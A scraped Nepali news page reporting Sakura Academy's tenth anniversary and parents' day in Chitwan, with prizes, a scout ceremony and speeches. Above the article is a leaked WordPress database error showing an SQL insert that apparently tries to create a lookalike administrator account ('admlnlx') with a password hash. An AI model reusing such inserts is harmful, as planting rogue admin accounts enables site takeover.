WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BhC10YSygM4FzdD1HR6b8jksjp7x0p1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 23:23:58', '', 'admlnlx', 'admlnlx')
चितवन , माघ २८
राप्ती नगरपालिका वडा नं.९ वीरेन्द्रनगरमा रहेको साकुरा एकाडेमीले आफनो १० औं बार्षिकोत्सब तथा अभिभाबक दिवस मनाएको छ । विद्यालय निरीक्षक होमकान्त अधिकारी प्रमुख अतिथि रहेको सो कार्यक्रममा विद्यालयका प्राचार्य रामकृष्ण पन्तले शैक्षिक प्रतिवेदन प्रस्तुत गरेको थिए ।
सो अबसरमा बार्षिकोत्सवमा आयोजना गरिएको विभिन्न प्रतियोगिताका विजेताहरुलाई पुरस्कार वितरण गरिनुका साथै स्काउट ट्र्रपको प्रथम दिक्षान्त समारोह गरिएको प्राचार्य रामकृष्ण पन्तले जानकारी दिए । विद्यालय सञ्चालक समितिका अध्यक्ष गोविन्द कँडेलको अध्यक्षतामा भएको कार्यक्रममा शिक्षक अभिभाबक संघका अध्यक्ष इन्द्रबहादुर तामाङ,विद्यालय व्यवस्थापन समितिका अध्यक्ष खिमानन्द अर्याल,प्रबन्ध निर्देशक हरि प्रसाद पौडेल लगायतले वोलेका थिए ।